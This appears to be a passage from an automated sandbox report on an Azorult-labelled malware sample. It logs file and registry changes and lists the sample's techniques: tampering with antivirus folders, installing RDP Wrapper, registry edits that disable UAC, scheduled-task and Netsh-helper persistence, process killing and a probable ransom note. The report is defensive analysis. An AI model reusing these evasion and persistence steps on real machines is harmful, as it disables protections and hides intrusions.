| File opened for modification | C:\Program Files\Enigma Software Group | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Malwarebytes | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVG | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\ESET | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft JDX | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SpyHunter | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\ByteFence | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Panda Security | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Zaxar | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\360 | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\SpyHunter | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\Common Files\System\iediagcmd.exe | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Kaspersky Lab | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Kaspersky Lab | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\AVG | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\rdp\RDPWInst.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\sets.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\automation.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_etld1_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\smart_switch_list.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\travel-facilitated-booking-kayak.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\crl-set | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\keys.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\nav_config.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\extraction.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\typosquatting_list.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_24898505\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\office_endpoints_list.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_full_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\classification.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\travel-facilitated-booking-bing.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\protocols.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A (21 identical rows)
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A (21 identical rows)
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A (19 identical rows)
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (16 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A (7 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A (7 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A (15 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\SpySheriff.exe N/A (2 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A (4 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A (2 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\rdp\Rar.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\rdp\RDPWInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\programdata\microsoft\intel\R8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A (2 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Windows\winit.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Windows\winit.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A (7 identical rows)

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A (5 identical rows)

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921237954079128" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings C:\programdata\microsoft\intel\R8.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-186956858-2143653872-2609589082-1000\{BA141F2C-3A75-459F-A01F-78DB12628BC1} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\MIME\Database C:\ProgramData\Windows\winit.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhostw.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A (2 identical rows)

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A (4 identical rows)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (2 identical rows)
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A (20 identical rows)
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A (16 identical rows)
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A (2 identical rows)
N/A N/A C:\ProgramData\Windows\winit.exe N/A (24 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A (3 identical rows)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (38 identical rows)

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A (2 identical rows)
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A (2 identical rows)
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A (5 identical rows)
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A (2 identical rows)
Token: SeDebugPrivilege N/A C:\rdp\RDPWInst.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (51 identical rows)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A (2 identical rows)
N/A N/A C:\ProgramData\Microsoft\Intel\wini.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A (4 identical rows)
N/A N/A C:\programdata\install\cheat.exe N/A
N/A N/A C:\programdata\install\ink.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
N/A N/A C:\programdata\microsoft\intel\P.exe N/A
N/A N/A C:\programdata\microsoft\intel\R8.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\WindowsTask\winlogon.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A (17 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4936 wrote to memory of 2316 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 identical rows)
PID 4936 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 identical rows)
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (26 identical rows)
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

System policy modification

defense_evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\Downloads\Azorult.exe N/A

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\20250322_162339.webp

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x314,0x7ffb204ef208,0x7ffb204ef214,0x7ffb204ef220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1732,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2444 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3468,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4204,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4228 /prefetch:1

